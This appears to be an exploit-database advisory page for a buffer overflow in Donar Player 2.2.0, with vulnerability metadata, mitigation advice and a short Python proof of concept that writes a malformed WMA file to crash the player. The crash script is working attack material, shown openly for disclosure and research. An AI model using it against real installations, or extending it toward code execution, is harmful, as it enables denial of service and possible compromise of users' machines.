header-logo
Suggest Exploit
vendor:
Donar Player
by:
b0telh0
7,8
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: Donar Player
Affected Version From: 2.2.0
Affected Version To: 2.2.0
Patch Exists: YES
Related CWE: N/A
CPE: 2.2.0
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2010

Donar Player 2.2.0 Local Crash PoC

Donar Player 2.2.0 is vulnerable to a buffer overflow vulnerability when a specially crafted WMA file is opened and played. This can lead to a crash of the application and potentially allow arbitrary code execution.

Mitigation:

Upgrade to the latest version of Donar Player
Source

Exploit-DB raw data:

#!/usr/bin/python
#
# Title: Donar Player 2.2.0 Local Crash PoC
# Date: 03-21-2010
# Author: b0telh0
# Link: http://www.donarzone.com/downloads/donar-player-setup-free.exe
# Tested on: Windows XP SP3


crash = "\x41" * 1000

try:
     file = open('b0t.wma','w');
     file.write(crash);
     file.close();
     print "\n[+] b0t.wma created."
     print "[+] File > Music Library > Add Files..."
     print "[+] Open b0t.wma and play it.\n"
except:
     print "\n[-] Error.. Can't write file to system.\n"

Navigation

Suggest Exploit

Services By CQR